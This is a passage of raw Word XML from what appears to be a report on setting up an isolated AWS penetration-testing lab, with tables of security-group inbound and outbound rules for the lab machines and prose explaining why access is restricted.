        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E64986F" w14:textId="392D8732" w:rsidR="00B9127C" w:rsidRPr="00D77DFE" w:rsidRDefault="00482D79"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Launch_wizard_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B9127C" w:rsidRPr="00D77DFE" w14:paraId="2D765F41" w14:textId="77777777" w:rsidTr="00087E54">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CC6938D" w14:textId="58D0DB3D"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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69177398"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43BA734C" w14:textId="77777777" w:rsidR="00B9127C" w:rsidRPr="00D77DFE" w:rsidRDefault="00B9127C"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Public_IP_of_Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62E605B8" w14:textId="7BBF6020" w:rsidR="00B9127C" w:rsidRPr="00D77DFE" w:rsidRDefault="00482D79"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Launch_wizard_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37A7F4CC" w14:textId="30228D9E" w:rsidR="00095180" w:rsidRPr="00D77DFE" w:rsidRDefault="00095180" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E6BEA3C" w14:textId="1D95DD51" w:rsidR="00087E54" w:rsidRPr="00D77DFE" w:rsidRDefault="00971B90" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>For the same reason, inbound access to port 80 is limited exclusively to the tester. The machine hosts a web application containing high‑risk vulnerabilities, including the potential for unauthorized shell uploads, making restricted access essential.</w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB77DE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Additionally, Security Groups with names beginning with 'Launch_wizard_' are default AWS-assigned names.</w:t>
      </w:r>
      <w:r w:rsidR="00317F9F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00087E54" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The outbound rules in ServerMeta are shown in Table 4.17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBA6CA7" w14:textId="50F0A78C" w:rsidR="008478B2" w:rsidRPr="00D77DFE" w:rsidRDefault="006D6EE0" w:rsidP="00087E54">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.17: </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="0073194D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">utbound </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="0073194D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ules</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in ServerMeta</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110"/>
        <w:gridCol w:w="2094"/>
        <w:gridCol w:w="2128"/>
        <w:gridCol w:w="2161"/>
      </w:tblGrid>
      <w:tr w:rsidR="0073194D" w:rsidRPr="00D77DFE" w14:paraId="4C78FF4A" w14:textId="77777777" w:rsidTr="00087E54">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E82A097"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14577682"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A6A0ECC"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Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51C6A371"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Security_group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0073194D" w:rsidRPr="00D77DFE" w14:paraId="131233D6" w14:textId="77777777" w:rsidTr="00087E54">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58E6A089"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22A97BC4"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5AFDD96E" w14:textId="77777777"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="578B38E3" w14:textId="4A469ED3" w:rsidR="0073194D" w:rsidRPr="00D77DFE" w:rsidRDefault="0073194D" w:rsidP="00087E54">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Launch_wizard_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BC4F89F" w14:textId="77777777" w:rsidR="0073194D" w:rsidRPr="00D77DFE" w:rsidRDefault="0073194D" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB9825B" w14:textId="0B5F5533" w:rsidR="00971B90" w:rsidRPr="00D77DFE" w:rsidRDefault="00CC5E2A" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The last instance</w:t>
      </w:r>
      <w:r w:rsidR="00971B90" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>represents a</w:t>
      </w:r>
      <w:r w:rsidR="00971B90" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00971B90" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ecret</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> m</w:t>
      </w:r>
      <w:r w:rsidR="00971B90" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">achine in subnet 4, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidR="00971B90" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>is configured with highly restrictive rules. It can communicate only with hosts in subnet 3</w:t>
      </w:r>
      <w:r w:rsidR="008F3FED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00971B90" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F3FED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>it was initially configured with internet access for setup purposes, which is then restricted after configuration is complete</w:t>
      </w:r>
      <w:r w:rsidR="00971B90" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, reflecting a tightly isolated asset. Even the tester cannot access it after initial setup, reinforcing its role as a protected system reachable solely from the 10.0.3.0/24 network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116D4B5D" w14:textId="19581C28" w:rsidR="00A6587D" w:rsidRPr="00D77DFE" w:rsidRDefault="00087E54" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The inbound and outbound rules in SecretMachine are shown in Table 4.18 and in            Table 4.19.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED9C888" w14:textId="3B589760" w:rsidR="0073194D" w:rsidRPr="00D77DFE" w:rsidRDefault="006D6EE0" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.18: </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nbound </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ules in </w:t>
      </w:r>
      <w:r w:rsidR="00E07016" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SecretMachine</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053"/>
        <w:gridCol w:w="2072"/>
        <w:gridCol w:w="2193"/>
        <w:gridCol w:w="2175"/>
      </w:tblGrid>
      <w:tr w:rsidR="0073194D" w:rsidRPr="00D77DFE" w14:paraId="517C88DC" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C60B598"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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05236C07"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97" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AF3F9EC"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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CC7A11C"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 xml:space="preserve">Security group </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0073194D" w:rsidRPr="00D77DFE" w14:paraId="14827AF9" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="319B4A06"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0-65535</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D738373"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4386A041" w14:textId="1BF9BFF9"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10.0.3.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EBEB069"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Launch_wizard_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0073194D" w:rsidRPr="00D77DFE" w14:paraId="0BB377D7" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CB4593A"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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DCFFDCE"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ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2297" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F48ABDE" w14:textId="5D1E66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10.0.3.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71F629EE"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Launch_wizard_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0073194D" w:rsidRPr="00D77DFE" w14:paraId="773E8881" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F0927A0"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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D4231FE"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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2297" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F84A356" w14:textId="29A9984E"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10.0.3.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E7AC759" w14:textId="67E32C29"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Launch_wizard_7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="432A6F61" w14:textId="77777777" w:rsidR="0073194D" w:rsidRPr="00D77DFE" w:rsidRDefault="0073194D" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4A22A1" w14:textId="38B216A3" w:rsidR="009E63C2" w:rsidRPr="00D77DFE" w:rsidRDefault="00D10649" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">All inbound traffic is allowed only from Subnet_3. Outbound rules permit traffic to other subnets and to the Internet. This configuration is necessary to install and configure the systems while allowing traffic to reach </w:t>
      </w:r>
      <w:r w:rsidR="00BC5DB5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>the tester</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">, as </w:t>
      </w:r>
      <w:r w:rsidR="00BC5DB5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>he is</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> connecting from an external IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B300F27" w14:textId="5967922B" w:rsidR="0073194D" w:rsidRPr="00D77DFE" w:rsidRDefault="006D6EE0" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.19: </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="0073194D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">utbound </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="0073194D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ules for SecretMachine</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2081"/>
        <w:gridCol w:w="2083"/>
        <w:gridCol w:w="2138"/>
        <w:gridCol w:w="2191"/>
      </w:tblGrid>
      <w:tr w:rsidR="0073194D" w:rsidRPr="00D77DFE" w14:paraId="17866066" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67AB27B8"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Port Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C1FB79B"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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57D36F27"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Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="655C0DB2"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Security_group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0073194D" w:rsidRPr="00D77DFE" w14:paraId="4D55173A" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="192CF0C4"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6C1D3C28"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All</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3899CA23"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0.0.0.0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EEC6113" w14:textId="77777777" w:rsidR="0073194D" w:rsidRPr="00D77DFE" w:rsidRDefault="0073194D" w:rsidP="00324A56">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Launch_wizard_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47523A8A" w14:textId="77777777" w:rsidR="0073194D" w:rsidRPr="00D77DFE" w:rsidRDefault="0073194D" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A464406" w14:textId="6DA63CC3" w:rsidR="008478B2" w:rsidRPr="00D77DFE" w:rsidRDefault="009C444F" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc223521111"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="009E776C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004F310C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configuring the</w:t>
      </w:r>
      <w:r w:rsidR="00662484" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
